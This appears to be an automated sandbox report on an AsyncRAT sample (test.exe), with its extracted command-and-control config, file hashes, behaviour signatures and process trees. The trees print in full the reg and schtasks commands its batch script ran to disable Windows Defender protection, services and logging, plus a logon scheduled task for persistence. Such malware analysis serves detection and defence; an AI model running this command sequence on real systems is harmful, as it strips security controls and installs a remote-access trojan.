Resubmissions
28-06-2024 21:31  240628-1dj7rswanm  10
28-06-2024 21:30  240628-1cwjeasfjf  10
28-06-2024 21:23  240628-z8y4qssdrg  10
28-06-2024 21:14  240628-z3lw8avfpn  10
Analysis
max time kernel: 159s
max time network: 166s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-06-2024 21:23
Static task
static1
General
Target: test.exe
Size: 101KB
MD5: 8eab3abc6963ebf4446c5e5aa559f1d4
SHA1: 5901818505035554b05204b2575aebfcde196d35
SHA256: d01b020acbaee9457d161a79b852932cc192a2dde3d47ac14292eab667aee068
SHA512: d55786d83c067fbe8d39537496979b3a3fb92ee87b16f39caa0795c9eef1eb7d354636058569c870a93e8f1888c6f3ee5e75d978dda9b31ae062de47fb306432
SSDEEP: 3072:gvGyYiSDnt1lD5ScJk3sVkwqAOOwOfHQ:E41YCQ/lhVOfw
Malware Config
Extracted
asyncrat
1.0.7
Default
127.0.0.1:8848
185.188.183.18:8848
DbNvcWoLvbqX
delay: 1
install: true
install_file: csrss.exe
install_folder: %AppData%
Signatures
Modifies Windows Defender Real-time Protection settings
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Modifies Windows Defender notification settings
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | reg.exe
Modifies security service 2 TTPs 2 IoCs
Processes: reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Async RAT payload 1 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\svchost.exe | family_asyncrat
Downloads MZ/PE file
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: dllhost.exe, svchost.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | dllhost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | svchost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | dllhost.exe
Executes dropped EXE 6 IoCs
Processes: dllhost.exe, svchost.exe, csrss.exe
pid | process
4784 | dllhost.exe
3080 | svchost.exe
2032 | csrss.exe
4908 | svchost.exe
5104 | dllhost.exe
3312 | svchost.exe
Adds Run key to start application 2 TTPs 2 IoCs
Processes: test.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | test.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | test.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe 1 IoCs
Processes: timeout.exe
pid | process
1624 | timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: svchost.exe, csrss.exe
pid | process
3080 | svchost.exe (repeated entries)
2032 | csrss.exe (repeated entries)
Suspicious behavior: LoadsDriver 10 IoCs
pid: 4, 4, 4, 4, 4, 680, 4, 4, 4, 4
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: svchost.exe, csrss.exe
description | pid | process
Token: SeDebugPrivilege | 3080 | svchost.exe
Token: SeDebugPrivilege | 2032 | csrss.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: test.exe, cmd.exe
description | pid | process | target process
Each row below is recorded twice in the report.
PID 2296 wrote to memory of 336 | 2296 | test.exe | cmd.exe
PID 336 wrote to memory of 2448 | 336 | cmd.exe | openfiles.exe
PID 336 wrote to memory of 4012 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 1136 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 3948 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 3464 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2576 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 5108 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 4744 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 864 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 368 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2240 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 1004 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2564 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 836 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2500 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2880 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 2852 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 1032 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 5028 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 492 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 1064 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 4392 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 3972 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 1784 | 336 | cmd.exe | schtasks.exe
PID 336 wrote to memory of 3920 | 336 | cmd.exe | schtasks.exe
PID 336 wrote to memory of 3720 | 336 | cmd.exe | schtasks.exe
PID 336 wrote to memory of 4856 | 336 | cmd.exe | schtasks.exe
PID 336 wrote to memory of 3420 | 336 | cmd.exe | schtasks.exe
PID 336 wrote to memory of 4484 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 4476 | 336 | cmd.exe | reg.exe
PID 336 wrote to memory of 4628 | 336 | cmd.exe | reg.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each entry is listed as image path | command line | PID, indented by process depth, with the signatures triggered by that process on the following "- " lines.
C:\Users\Admin\AppData\Local\Temp\test.exe | "C:\Users\Admin\AppData\Local\Temp\test.exe" | PID 2296
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\cmd.exe | cmd /c main.bat | PID 336
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\openfiles.exe | openfiles | PID 2448
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f | PID 4012
      - Modifies Windows Defender notification settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f | PID 1136
    C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f | PID 3948
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID 3464
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f | PID 2576
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID 5108
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID 4744
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f | PID 864
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f | PID 368
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID 2240
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID 1004
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID 2564
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID 836
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID 2500
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f | PID 2880
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID 2852
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID 1032
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID 5028
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID 492
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f | PID 1064
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 4392
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 3972
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID 1784
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID 3920
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID 3720
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID 4856
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID 3420
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f | PID 4484
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | PID 4476
    C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID 4628
    C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | PID 3140
    C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | PID 688
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f | PID 4844
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | PID 3776
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | PID 4908
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | PID 1576
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | PID 1624
      - Modifies security service
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exe | dllhost.exe | PID 4784
      - Checks computer location settings
      - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\svchost.exe" | PID 3080
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit | PID 2068
          C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' | PID 1060
            - Scheduled Task/Job: Scheduled Task
        C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA505.tmp.bat"" | PID 4036
          C:\Windows\system32\timeout.exe | timeout 3 | PID 1624
            - Delays execution with timeout.exe
          C:\Users\Admin\AppData\Roaming\csrss.exe | "C:\Users\Admin\AppData\Roaming\csrss.exe" | PID 2032
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1016 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8 | PID 2384
C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | PID 2016
C:\Users\Admin\AppData\Local\Temp\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\svchost.exe" | PID 4908
  - Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\test.exe | "C:\Users\Admin\AppData\Local\Temp\test.exe" | PID 3192
  - Adds Run key to start application
  C:\Windows\SYSTEM32\cmd.exe | cmd /c main.bat | PID 2908
    C:\Windows\system32\openfiles.exe | openfiles | PID 4744
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f | PID 4000
      - Modifies Windows Defender notification settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f | PID 1004
    C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f | PID 216
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID 1332
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f | PID 4500
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID 4528
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID 1140
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f | PID 756
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f | PID 4484
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID 1968
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID 2924
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID 3644
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID 1804
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID 4480
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f | PID 4244
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID 3800
      - Modifies Windows Defender Real-time Protection settings
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID 3848
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID 4340
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID 3156
    C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f | PID 4304
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 688
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 4560
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID 4968
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID 4316
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID 1848
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID 4608
    C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID 4744
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f | PID 2500
    C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | PID 216
    C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID 3004
    C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | PID 384
    C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | PID 1140
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f | PID 1336
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | PID 936
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | PID 2924
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | PID 3644
    C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | PID 1804
      - Modifies security service
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.exe | dllhost.exe | PID 5104
      - Checks computer location settings
      - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\svchost.exe" | PID 3312
        - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution 1
  Registry Run Keys / Startup Folder 1
Create or Modify System Process 3
  Windows Service 3
Scheduled Task/Job 1
  Scheduled Task 1
Downloads
Filesize: 425B
MD5: fff5cbccb6b31b40f834b8f4778a779a
SHA1: 899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256: b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA512: 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Filesize: 90KB
MD5: f75acc31206c792c4831f9aa52404b2b
SHA1: c1380e151eba78a3ec395f46d76fbcd273c10afe
SHA256: 7aaa38f2e289da72c6dc9b61d4951f34badc693798560f69ad42944eb470dbfd
SHA512: 80614ccd2823c429867a421ca0464ed088f474c2399681be398982a440112fa1683680a2f4cf496bec98f23792ea5a74ece95fd0741499b9389a98ab72c5a72f

Filesize: 4KB
MD5: ea021e4f2f77ebf4e02a39c82172e240
SHA1: 98f921e1b0d0a1273fb1c9e9dcf6245cbd92c91a
SHA256: c7c390518a2d06e2567eca287925058bcb8bc466cffe4c210fec0f9664f5bcde
SHA512: 7f201842a37cd57751d800a950beb5369e010f6dae34b6241db1b9e3b64c86bfe30c2116039a0f8a80bc79bd8371dd707140a9fe564e6468c4accb1eb3861d65

Filesize: 48KB
MD5: ee7346d7b4db0921b8e859072b561514
SHA1: 6c0ccc2bab163fdabe93d9e7ae5a6d723a422709
SHA256: 7ef4770b47759c0b35cf97edca41ff0d6a61265a4cf910e7454b46a915218deb
SHA512: a1e04022702df848dad96ec28cb91fc9515b0ea03b1ed7f93deb8001e9a2efe4b49ac4ce848679cb591faf45505db6716cb5afe60f7754ba7a96d52cf595833f

Filesize: 149B
MD5: d2c0af9ac36786c859b82a282797550e
SHA1: f2c0378248d92f6c48d01b442dbcf6af0f6d2aa7
SHA256: 823f24782dc2fee896a93d431fcbec008935c2e7b836cd8d75ebf982e840a375
SHA512: 7fce5adf54a1152cbc93c9de7e3f12029e44730b97f62eacde183dad82ac8173019dca27b4464b15103be2319ed4cbd51bd847dafa73dfc71e2ad68b08bf05a3